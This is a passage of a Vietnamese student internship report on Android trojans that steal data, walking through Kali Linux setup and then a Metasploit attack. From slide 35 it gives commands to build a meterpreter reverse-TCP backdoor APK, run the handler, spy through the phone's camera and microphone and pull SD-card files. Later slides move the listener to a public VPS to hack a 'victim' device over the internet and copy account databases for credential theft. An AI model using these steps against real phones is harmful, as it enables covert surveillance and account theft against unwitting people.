trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.
  • 24. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa 5.2 Cài đặt Kali Linux trên máy ảo VMWare Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/
  • 25. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó: Đặt tên và đặt đường dẫn cho máy ảo
  • 26. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường... Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!
  • 27. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Phần Partition chọn Guided – use entire disk và All files in one partition
  • 28. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Chọn Finish partitioning and write changes to disk Chọn Yes
  • 29. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
  • 30. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
  • 31. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và password đã đặt ở phần trước. Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
  • 32. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 5.3 Tạo mã độc trên Kali Linux để xâm nhập Android Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
  • 33. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network Bấm vào Edit -> Virtual Network Editor...
  • 34. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
  • 35. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk 192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali 8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
  • 36. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor. Tiếp theo, gõ lệnh msfconsole Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler
  • 37. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín set payload android/meterpreter/reverse_tcp set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. set lport 8080 – nhập port giống với port khi tạo payload ở trên. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp:
  • 38. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín
  • 39. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Để xem thông tin về máy, nhập lệnh SysInfo  Sử dụng camera: Để xem danh sách camera, nhập webcam_list
  • 40. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
  • 41. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy  Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy  Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
  • 42. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
  • 43. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín
  • 44. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Dùng lệnh cd /sdcard/Download để vào thư mục Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk Và file này sẽ được tải về thư mục root của máy Kali
  • 45. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín II. THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET 1.TRIỂN KHAI LÊN VPS 1.1 Cài đặt Metasploit lên VPS 1. Giới thiệu Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 2. Cài đặt Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu.
  • 46. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác. Chọn folder cài đặt:
  • 47. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: Chọn server và ngày hết hạn, để mặc định:
  • 48. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Quá trình cài đặt của Metasploit:
  • 49. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
  • 50. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau khi Finish trình duyệt web mở lên và đi tới giao diện
  • 51. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account: Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
  • 52. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET Các bước thực hiện 1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132 2. Khởi động Metasploit Console trên VPS
  • 53. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử dụng chính IP của VPS 4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
  • 54. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ
  • 55. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Để xem các lệnh ta gõ help Để xem thông tin về máy, nhập lệnh SysInfo Để xem các tác vụ đang chạy gõ ps Xem ip gõ ipconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Lấy file từ sd card
  • 56. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải về máy, ta nhập lệnh Download App.apk để upload gõ lệnh upload Và file này sẽ được tải về thư mục root của máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is 0 tức là đã root ls -l danh mục file và các quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách và down load các file hay thay đổi các file trong ROM đầu tiên phải gõ lệnh SU để có toàn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data ^C để quay lại Sử dụng SQLite để mở file db
  • 57. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP Những kiến thức lý thuyết đã được củng cố:  Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android  Tìm hiểu về hệ điều hành Kali Linux  Tìm hiểu về các lỗ hổng bảo mật của Windows và Android  Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng Những kỹ năng thực hành đã được học thêm:  Thực hiện cài đặt Android trên máy ảo  Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android  Thi lấy chứng chỉ System Hacking của trung tâm Athena  Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android  Biết thêm về một số bài học trong lớp Hacker mũ trắng Những kinh nghiệm thực tiễn đã tích lũy được: Qua gần 3 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử.